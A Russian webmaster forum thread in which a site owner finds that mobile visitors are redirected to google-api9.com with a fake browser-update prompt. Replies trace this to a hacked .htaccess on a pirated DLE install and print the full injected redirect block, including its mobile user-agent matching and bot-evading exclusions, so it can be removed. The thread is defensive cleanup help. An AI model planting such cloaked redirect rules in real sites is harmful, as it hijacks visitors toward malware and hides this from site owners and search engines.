X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Сайт с мобильной версии, Редирект? Вирус?
Gera
Gera
Topic Starter сообщение 22.10.2012, 23:22; Ответить: Gera
Сообщение #1


Завсегдатай
*****

Группа: Active User
Сообщений: 568
Регистрация: 22.7.2010
Из: Ростова-на-Дону
Поблагодарили: 74 раза
Репутация:   29  


Доброго времени суток smile.gif

Вот пациент: WinAdm.com

Проблема: раньше заходил на свой сайт с телефона, хоть он и отображался коряво, но отображался smile.gif Вот сегодня решил настроить корректное отображение его с мобильно версии, включил у себя на телефоне приложение Opera (раньше так и делал), открываю сайт, а меня перекидывает на страницу google-api9.com (там ещё разные символов в конце URL, после слеша) и требует обновить версию браузера до 7.0.

Хорошо, решил зайти через стандартный Интернет браузер в телефоне, тоже самое. Вот теперь сижу и думаю, что это может быть? Проверил сайт через различные сервисы, вирусов не находит.

Может быть, кто-нибудь сталкивался с подобным? Как быть? excl.gif


--------------------
Рисую картины баллончиками в стиле Spray Paint Art https://vk.com/gerasimov_sprayart
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
wasley
wasley
сообщение 22.10.2012, 23:32; Ответить: wasley
Сообщение #2


Участник
***

Группа: User
Сообщений: 164
Регистрация: 30.11.2011
Поблагодарили: 48 раз
Репутация:   9  


Вирус. Скорее всего в файле .htaccess . Надо его почистить


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
falken
falken
сообщение 22.10.2012, 23:35; Ответить: falken
Сообщение #3


online
*******

Группа: Ex-Moderator
Сообщений: 3742
Регистрация: 23.3.2011
Поблагодарили: 3986 раз
Репутация:   361  


Дайк угадаю: движок DLE нулёдный?


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Gera
Gera
Topic Starter сообщение 22.10.2012, 23:36; Ответить: Gera
Сообщение #4


Завсегдатай
*****

Группа: Active User
Сообщений: 568
Регистрация: 22.7.2010
Из: Ростова-на-Дону
Поблагодарили: 74 раза
Репутация:   29  


(falken @ 22.10.2012, 23:35) *
Вирус. Скорее всего в файле .htaccess . Надо его почистить

Это точно вирус?

(falken @ 22.10.2012, 23:35) *
Дайк угадаю: движок DLE нулёдный?

Всё верно smile.gif


--------------------
Рисую картины баллончиками в стиле Spray Paint Art https://vk.com/gerasimov_sprayart
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
falken
falken
сообщение 22.10.2012, 23:41; Ответить: falken
Сообщение #5


online
*******

Группа: Ex-Moderator
Сообщений: 3742
Регистрация: 23.3.2011
Поблагодарили: 3986 раз
Репутация:   361  


Gera, тут 2 варианта:
- купить лицензию
- чистить ручками

Возможно ломанули, но маловероятно. Нынче любят особенно в нуледные длешки подобную муть запихивать.

Сообщение отредактировал falken - 22.10.2012, 23:44
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Gera
Gera
Topic Starter сообщение 22.10.2012, 23:48; Ответить: Gera
Сообщение #6


Завсегдатай
*****

Группа: Active User
Сообщений: 568
Регистрация: 22.7.2010
Из: Ростова-на-Дону
Поблагодарили: 74 раза
Репутация:   29  


falken, скорее всего, ломанули, т.к. раньше подобного не замечал, сейчас буду смотреть. Зашел через ftp и вижу, что папки Bаckup, language, templates и файл .htaccess дата изменения стоит одна и та же, а именно 20.10.2012 в 02:38, хотя в этот день, насколько я помню, я не мог зайти, уезжал...

P.S. Сколько стоит лицензия DLE?


--------------------
Рисую картины баллончиками в стиле Spray Paint Art https://vk.com/gerasimov_sprayart
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Леффан
Леффан
сообщение 22.10.2012, 23:57; Ответить: Леффан
Сообщение #7


Завсегдатай
*****

Группа: Active User
Сообщений: 553
Регистрация: 29.11.2009
Из: Санкт-Петербург
Поблагодарили: 154 раза
Репутация:   24  


http://dle-news.ru/price.html
Скиньте свой файл .htaccess сюда, в тему. У меня такое тоже было.
Самое главное, что вредоносный код был в самом конце. То есть много-много пропусков строки, и там глубоко был код редиректа мобильного траффика smile.gif


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
falken
falken
сообщение 22.10.2012, 23:57; Ответить: falken
Сообщение #8


online
*******

Группа: Ex-Moderator
Сообщений: 3742
Регистрация: 23.3.2011
Поблагодарили: 3986 раз
Репутация:   361  


(Gera @ 22.10.2012, 23:48) *
а именно 20.10.2012 в 02:38, хотя в этот день, насколько я помню, я не мог зайти, уезжал...

Видимо да, взлом.

(Gera @ 22.10.2012, 23:48) *
Сколько стоит лицензия DLE?

Базовая - 59$
Расширенная - 78$
Продление - 39$

Все на год, естественно. Подробней можете почитать на официальном сайте.


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Gera
Gera
Topic Starter сообщение 23.10.2012, 0:31; Ответить: Gera
Сообщение #9


Завсегдатай
*****

Группа: Active User
Сообщений: 568
Регистрация: 22.7.2010
Из: Ростова-на-Дону
Поблагодарили: 74 раза
Репутация:   29  


Леффан, вот мой файл .htaccess

Сейчас посмотрел все папки, которые были изменены в одно и тоже время и заметил, что в каждой из них загружен этот же файл .haccess !!!

Сейчас посмотрел все мои сайты, оказывается на всех моих сайтах был изменен файл .htaccess в это же время...

Сообщение отредактировал Gera - 23.10.2012, 0:12
Прикрепленные файлы
Прикрепленный файл  htaccess.txt ( 12,49 килобайт ) Кол-во скачиваний: 50
 


--------------------
Рисую картины баллончиками в стиле Spray Paint Art https://vk.com/gerasimov_sprayart
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
baskin_BR
baskin_BR
сообщение 23.10.2012, 0:55; Ответить: baskin_BR
Сообщение #10


Бывалый
****

Группа: User
Сообщений: 372
Регистрация: 5.11.2010
Поблагодарили: 75 раз
Репутация:   18  


ваш файл не скачивается.
в-общем, удаляйте такой код:
Развернуть/Свернуть
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]
RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]
RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]
RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blac [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} brew [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cell [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dang [NC,OR]
RewriteCond %{HTTP_USER_AGENT} doco [NC,OR]
RewriteCond %{HTTP_USER_AGENT} eric [NC,OR]
RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} inno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} keji [NC,OR]
RewriteCond %{HTTP_USER_AGENT} leno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maui [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mits [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} moto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} newt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} noki [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR]
RewriteCond %{HTTP_USER_AGENT} palm [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pana [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pant [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phil [NC,OR]
RewriteCond %{HTTP_USER_AGENT} play [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} port [NC,OR]
RewriteCond %{HTTP_USER_AGENT} prox [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sage [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sams [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sany [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} send [NC,OR]
RewriteCond %{HTTP_USER_AGENT} seri [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} shar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} siem [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smal [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sony [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} teli [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR]
RewriteCond %{HTTP_USER_AGENT} voda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR]
RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPhone [NC,OR]
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
RewriteCond %{HTTP_USER_AGENT} !unix [NC]
RewriteCond %{HTTP_USER_AGENT} !macos [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !playstation [NC]
RewriteCond %{HTTP_USER_AGENT} !google [NC]
RewriteCond %{HTTP_USER_AGENT} !yandex [NC]
RewriteCond %{HTTP_USER_AGENT} !bot [NC]
RewriteCond %{HTTP_USER_AGENT} !libwww [NC]
RewriteCond %{HTTP_USER_AGENT} !msn [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !fdm [NC]
RewriteCond %{HTTP_USER_AGENT} !maui [NC]
RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]

RewriteRule ^(.*)$ http://google-api9.com/l.php?l=o___&r=___&a=___ [L,R=302]


также советую завести себе айболита: http://www.revisium.com/ai/ - поможет найти шелл на сайте(ах).
после этого меняйте пароли (ВСЕ!), закрывайте дыру, через которую был залит дор и еще раз смените пароли (!)
и лицензия на DLE - не панацея от бед, т.к. можно попасть через хостинг на сайт, не обязательно через движок

Сообщение отредактировал baskin_BR - 23.10.2012, 1:00


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Оцените сайт на рыболовную тематику. Все кто любят критиковать прошу сюда.
8 alexandrrr 669 Вчера, 23:14
автор: Ronkqe
Горячая тема (нет новых ответов) ВНИМАНИЕ: Как самостоятельно продвинуть сайт? Научу!
консультации в домашних условиях :)
227 GlazAlmaz 78080 Вчера, 22:35
автор: Dempo
Горячая тема (нет новых ответов) Дешевый трафик на сайт, накрутка счетчиков
накрутка статистики (бот трафик)
146 StarWareznik 69025 Вчера, 21:23
автор: Swissi
Открытая тема (нет новых ответов) Попинайте сайт
7 yanat 786 Вчера, 17:25
автор: areainfo
Открытая тема (нет новых ответов) Стану Вашим рефералом. Готовый трастовый сайт в наличии!
0 referer 458 Вчера, 11:22
автор: referer


 



RSS Текстовая версия Сейчас: 19.12.2017, 2:27
Дизайн